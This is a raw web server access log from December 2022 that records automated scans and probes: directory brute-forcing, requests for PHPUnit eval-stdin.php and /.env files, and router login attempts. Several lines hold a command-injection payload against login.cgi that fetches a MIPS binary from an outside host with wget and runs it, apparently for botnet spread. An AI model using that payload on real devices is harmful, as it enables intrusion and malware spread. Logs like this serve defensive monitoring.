178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /localstart.html HTTP/1.1" 404 320 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /menu.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /start.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /base.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /base.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /home.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /base.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:40 +0100] "GET /start.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:41 +0100] "GET /base.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:41 +0100] "GET /menu.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:41 +0100] "GET /default.asp HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:41 +0100] "GET /indice.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:41 +0100] "GET /default.jsp HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:41 +0100] "GET /localstart.pl HTTP/1.1" 404 318 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /default.html HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /start.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /inicio.pl HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /index.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /index.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /default.shtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:42 +0100] "GET /home.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:43 +0100] "GET /inicio.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:43 +0100] "GET /inicio.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:43 +0100] "GET /main.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:43 +0100] "GET /menu.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:43 +0100] "GET /base.inc HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:43 +0100] "GET /base.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /index.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /index.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /indice.jhtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /default.jsa HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /main.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /start.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:44 +0100] "GET /indice.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:45 +0100] "GET /base.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:45 +0100] "GET /localstart.jsp HTTP/1.1" 404 319 "-" "curl/7.54.0"
141.255.166.2 - - [04/Dec/2022:23:37:45 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
178.79.139.171 - - [04/Dec/2022:23:37:45 +0100] "GET /indice.pl HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:45 +0100] "GET /indice.jsa HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:45 +0100] "GET /base.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:45 +0100] "GET /index.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /localstart.jsa HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /indice.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /indice.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /index.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /inicio.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /default.cgi HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:46 +0100] "GET /inicio.jhtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:47 +0100] "GET /index.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:47 +0100] "GET /start.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:47 +0100] "GET /inicio.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:47 +0100] "GET /base.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:47 +0100] "GET /admin.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:47 +0100] "GET /inicio.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /index.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /localstart.php HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /indice.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /index.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /indice.html HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /localstart.jhtml HTTP/1.1" 404 321 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:48 +0100] "GET /localstart.cfm HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:49 +0100] "GET /admin.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:49 +0100] "GET /localstart.cgi HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:49 +0100] "GET /localstart.aspx HTTP/1.1" 404 320 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:49 +0100] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:49 +0100] "GET /main.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:49 +0100] "GET /localstart.asp HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:50 +0100] "GET /menu.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:50 +0100] "GET /home.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:50 +0100] "GET /base.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:50 +0100] "GET /home.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:50 +0100] "GET /menu.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:50 +0100] "GET /home.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:51 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:51 +0100] "GET /main.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:51 +0100] "GET /main.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:51 +0100] "GET /main.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:51 +0100] "GET default.asp HTTP/1.1" 400 333 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.139.171 - - [04/Dec/2022:23:37:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Dec/2022:23:37:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:38:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:39:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:40:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.91.47.43 - - [04/Dec/2022:23:41:16 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
141.255.166.2 - - [04/Dec/2022:23:41:22 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [04/Dec/2022:23:41:26 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Dec/2022:23:41:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:42:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:43:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Dec/2022:23:44:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:45:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [04/Dec/2022:23:46:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [04/Dec/2022:23:46:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:46:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Dec/2022:23:47:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:48:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:49:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:50:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [04/Dec/2022:23:50:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Dec/2022:23:50:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [04/Dec/2022:23:51:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Dec/2022:23:51:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Dec/2022:23:51:34 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [04/Dec/2022:23:51:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:52:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Dec/2022:23:52:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:53:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Dec/2022:23:53:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:54:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:55:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.243.105.249 - - [04/Dec/2022:23:55:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Dec/2022:23:56:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:57:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:58:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Dec/2022:23:58:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:59:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [05/Dec/2022:00:00:20 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
51.222.253.7 - - [05/Dec/2022:00:03:14 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.185 - - [05/Dec/2022:00:03:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
117.89.9.233 - - [05/Dec/2022:00:07:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
141.255.166.2 - - [05/Dec/2022:00:08:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:00:10:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
61.147.15.67 - - [05/Dec/2022:00:10:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
61.147.15.65 - - [05/Dec/2022:00:10:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
61.147.15.67 - - [05/Dec/2022:00:11:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
61.147.15.65 - - [05/Dec/2022:00:11:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54"
141.255.166.2 - - [05/Dec/2022:00:15:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
59.187.205.166 - - [05/Dec/2022:00:22:53 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
172.91.47.43 - - [05/Dec/2022:00:22:56 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
143.244.130.110 - - [05/Dec/2022:00:25:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.244.130.110 - - [05/Dec/2022:00:25:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.244.130.110 - - [05/Dec/2022:00:25:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
173.214.175.178 - - [05/Dec/2022:00:25:05 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
193.39.209.114 - - [05/Dec/2022:00:27:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.151.56.42 - - [05/Dec/2022:00:27:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:30:01 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:30:52 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:32:06 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:33:00 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:33:36 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.11 - - [05/Dec/2022:00:33:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
152.89.196.211 - - [05/Dec/2022:00:34:06 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:34:41 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:37:32 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:37:52 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:38:28 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:41:45 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:42:51 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:43:04 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:44:11 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:44:52 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:45:02 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
109.237.97.180 - - [05/Dec/2022:00:46:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [05/Dec/2022:00:46:39 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
152.89.196.211 - - [05/Dec/2022:00:46:43 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:47:09 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:47:25 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:00:49:08 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.182.182.124 - - [05/Dec/2022:00:54:13 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.182.182.124 - - [05/Dec/2022:00:54:13 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
183.136.225.32 - - [05/Dec/2022:00:55:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [05/Dec/2022:01:01:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Dec/2022:01:01:15 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
